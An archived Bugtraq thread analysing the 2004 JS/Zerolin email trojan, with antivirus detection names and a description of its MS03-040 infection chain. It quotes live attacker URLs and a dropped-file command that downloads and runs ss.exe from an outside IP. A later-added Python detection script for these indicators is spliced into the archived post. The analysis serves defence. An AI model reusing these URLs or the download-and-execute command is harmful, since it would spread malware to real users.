Bugtraq mailing list archives

RE: JS/Zerolin
From: "Thor Larholm" <tlarholm () pivx com>
Date: Fri, 13 Aug 2004 17:04:58 -0700

Nicolas was kind enough to provide me with a sample of Zerolin.

Anyone who is even remotely up-to-date with their patches will not be affected by this. At the end of the email is a 
short piece of encoded JScript code which, when decoded, outputs a hidden iframe that retrieves the following URL:

http://202.99.172.153/link.html

Don't click the link; it is still live.

Following a lot of page breaks is an attempt to exploit the Object Data vulnerability that was fixed by MS03-040. If 
successful, this launches MSHTA.EXE, which executes the code provided by http://202.99.172.153/link.php, which in turn 
outputs an embedded file to C:\x.exe, after which it executes the following command:

C:\x.exe http://202.99.172.153/ss.exe

Here are some of the more interesting strings from that file, which suggest Zerolin talks back to index.php on that same 
IP to notify its owner of a compromised machine:


Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
thor () pivx com
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6  20CD 5BDB 3D99 4207 AEE9

PivX defines a new genre in Desktop Security: Proactive Threat Mitigation. 
<http://www.pivx.com/qwikfix>
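A defender-side check for the delivery chain Thor describes (an encoded JScript block hidden far down a mail body, a hidden iframe, and a remote `<object data=...>` of the MS03-040 kind), added here as an example and not part of the original post. The sample HTML and the `dropper.example` hostname are constructed placeholders; the `#@~^......==` prefix is the standard header of Windows Script Encoder (JScript.Encode) output.

```python
import re
from html.parser import HTMLParser

# Windows Script Encoder output opens with "#@~^", a 6-char base64 length field and "==".
ENCODED_JS_RE = re.compile(r"#@~\^[A-Za-z0-9+/]{6}==")


class MailHtmlScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # attribute names arrive lowercased
        if tag == "script":
            self._in_script = True
            if "encode" in a.get("language", "").lower():
                self.findings.append("script language=JScript.Encode")
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            hidden = ("display:none" in style or "visibility:hidden" in style
                      or a.get("width") == "0" or a.get("height") == "0")
            if hidden and a.get("src", "").lower().startswith("http"):
                self.findings.append("hidden iframe -> " + a["src"])
        elif tag == "object" and a.get("data", "").lower().startswith("http"):
            # MS03-040 vector: <object data="..."> pulling a remote resource (e.g. an HTA)
            self.findings.append("remote object data -> " + a["data"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies arrive here as raw text; look for the encoder header.
        if self._in_script and ENCODED_JS_RE.search(data):
            self.findings.append("JScript.Encode payload marker (#@~^)")


def scan_mail_html(html):
    """Return the list of indicators found in an HTML mail body or fetched page."""
    scanner = MailHtmlScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: ordinary-looking text, then the encoded script far below it.
SAMPLE_SPAM = ("<html><body><p>Your order has shipped.</p>" + "<br>" * 40
               + '<script language="JScript.Encode">#@~^QAAAAA==encoded-body==^#~@</script>'
               + '<iframe src="http://dropper.example/link.html" width="0" height="0"></iframe>'
               + '<object data="http://dropper.example/link.php"></object></body></html>')
```

`scan_mail_html(SAMPLE_SPAM)` reports all three stages; a body with only a normal, visible iframe reports nothing.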

-----Original Message-----
From: T.H. Haymore [mailto:bonk () webchat chatsystems com] 
Sent: Friday, August 13, 2004 7:51 AM
To: Nicolas Gregoire
Cc: bugtraq () securityfocus com; Mark.Amos () owenscorning com
Subject: Re: JS/Zerolin

On Fri, 13 Aug 2004, Nicolas Gregoire wrote:


Nicolas,

 Thanks for the insight.  I've received several replies telling me to look at McAfee (yadda-yadda) and other sites.  I 
am well aware of the Zerolin VBS script as I researched it before posting.  You've provided what insight I was looking 
for on the JavaScript side.

Mark, I think this is what we're looking for.  Also, keep us updated as to what else you see as this could very well be 
a new version and they are indeed 'testing'.



Thanks again,


-th

<snip>


Hi,

I've seen these emails since last Friday, and my gateway has since 
received around 200 of them. KAV and ClamAV detect them as 
"TrojanDropper.VBS.Zerolin".

It appears that a small JScript.Encoded code is hidden at the bottom 
of a false (true?) spam. After several redirections, an ss.exe file 
is downloaded. This file is detected as follows:

KAV : Trojan.Win32.Genme.c
Trend : not detected
ClamAV : Trojan.Xebiz.A
F-Prot : W32/Xebiz.A
NAI : not detected

Regards,
--
Nicolas Gregoire ----- Information Systems Security Consultant


=================================================
Travis
www.cyberabuse.org/crimewatch
Email: Bonk () chatsystems com | Bonk () cyberabuse org
=================================================
/"\
\ /
 X   ASCII Ribbon Campaign
/ \  Against HTML Email

